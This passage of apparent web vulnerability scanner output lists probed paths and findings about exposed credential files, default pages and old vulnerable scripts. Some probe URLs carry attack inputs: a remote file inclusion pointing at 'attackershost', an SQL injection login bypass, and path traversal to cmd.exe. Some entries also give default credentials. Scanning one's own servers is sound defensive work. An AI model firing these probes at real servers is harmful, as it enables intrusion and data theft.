+ OSVDB-3093: /mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /manage/login.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /members/ID.pm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /members/ID.xbb: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Downloads/voteinclude.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Forums/attachment.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Search/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/in.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/out.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/quit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/users.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Your_Account/navbar.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /moregroupware/modules/webmail2/inc/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /netget?sid=Safety&msg=2002&file=Safety: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /OpenTopic: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /parse_xml.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /php/php4ts.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pks/lookup: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /productcart/database/EIPC.mdb: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protected/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=': This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pt_config.inc: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /quikmail/nph-emumail.cgi?type=../%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/tradecli.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /servers/link.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /Site/biztalkhttpreceive.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /site_searcher.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /syslog.htm?%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /technote/print.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /texis/websearch/phine: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cms/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /site/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /uifc/MultFileUploadHandler.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /url.jsp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /utils/sprc.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /vars.inc+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /VBZooM/add-subject.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /web_app/WEB-INF/webapp.properties: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /XMBforum/buddy.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /XMBforum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /yabbse/Reminder.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /yabbse/Sources/Packages.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ows-bin/oaskill.exe?abcde.exe: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3093: /.wwwacl: Contains authorization information
+ OSVDB-3093: /.www_acl: Contains authorization information
+ OSVDB-3093: /.htpasswd: Contains authorization information
+ OSVDB-3093: /.access: Contains authorization information
+ OSVDB-3093: /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.
+ OSVDB-3093: /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.htaccess: Contains configuration and/or authorization information
+ OSVDB-3093: /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.
+ OSVDB-3093: /.passwd: Contains authorization information
+ OSVDB-3093: /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more.
+ OSVDB-3093: /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol
+ OSVDB-3093: /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more.
+ OSVDB-3093: /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ OSVDB-3093: /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/known_hosts: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /jservdocs/: Default Apache JServ docs should be removed.
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /akopia/: Akopia is installed.
+ OSVDB-3233: /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /php/index.php: Monkey Http Daemon default PHP file found.
+ OSVDB-3233: /servlet/Counter: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers.
+ OSVDB-3233: /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /admcgi/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found.
+ OSVDB-3233: /admisapi/fpadmin.htm: Default FrontPage file found.
+ OSVDB-3233: /bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /bin/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /bin/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpcount.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_private/orders.htm: Default FrontPage file found.
+ OSVDB-3233: /_private/orders.txt: Default FrontPage file found.
+ OSVDB-3233: /_private/register.htm: Default FrontPage file found.
+ OSVDB-3233: /_private/register.txt: Default FrontPage file found.
+ OSVDB-3233: /_private/registrations.txt: Default FrontPage file found.
+ OSVDB-3233: /_private/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
+ OSVDB-3233: /_vti_bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/cfgwiz.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/CGImail.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpremadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found.
+ OSVDB-3233: /_vti_bin/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_cnf/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_log/_vti_cnf/: FrontPage directory found.
+ OSVDB-3233: /_vti_pvt/administrators.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/authors.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/service.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /_vti_pvt/users.pwd: Default FrontPage file found, may be a password file.
+ OSVDB-3233: /help/contents.htm: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /help/home.html: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed.
+ OSVDB-3233: /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.
+ OSVDB-3233: /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers.
+ OSVDB-3233: /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/ServletManager: Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.
+ OSVDB-3233: /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system.
+ OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
+ OSVDB-3233: /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.
+ OSVDB-3233: /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers.
+ OSVDB-3233: /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers.
+ OSVDB-3233: /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information.
+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3233: /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
+ OSVDB-3233: /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'
+ OSVDB-3233: /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.
+ OSVDB-3282: /uploader.php: This script may allow arbitrary files to be uploaded to the remote server.
+ OSVDB-3284: /iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-3286: /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3286: /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3286: /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3286: /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081
+ OSVDB-3396: /mlog.html: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /mlog.phtml: Remote file read vulnerability 1999-0068
+ OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
+ OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
+ OSVDB-3411: /soapConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
+ OSVDB-3423: /XSQLConfig.xml: Oracle 9iAS configuration file found - see bugtraq #4290.
+ OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0705.
+ OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
+ OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
+ OSVDB-3501: /_private/form_results.txt: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
+ OSVDB-3512: /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).
+ OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
+ OSVDB-379: /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628.
+ OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
+ OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
+ OSVDB-4161: /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely.
+ OSVDB-4161: /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely.
+ OSVDB-4161: /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely.
+ OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
+ OSVDB-4237: /ban.bak: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4237: /banmat.pwd: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected.
+ OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
+ OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
+ OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
+ OSVDB-4314: /texis.exe/?-dump: Texis installation may reveal sensitive information.
+ OSVDB-4314: /texis.exe/?-version: Texis installation may reveal sensitive information.
+ OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
+ OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
+ OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013.
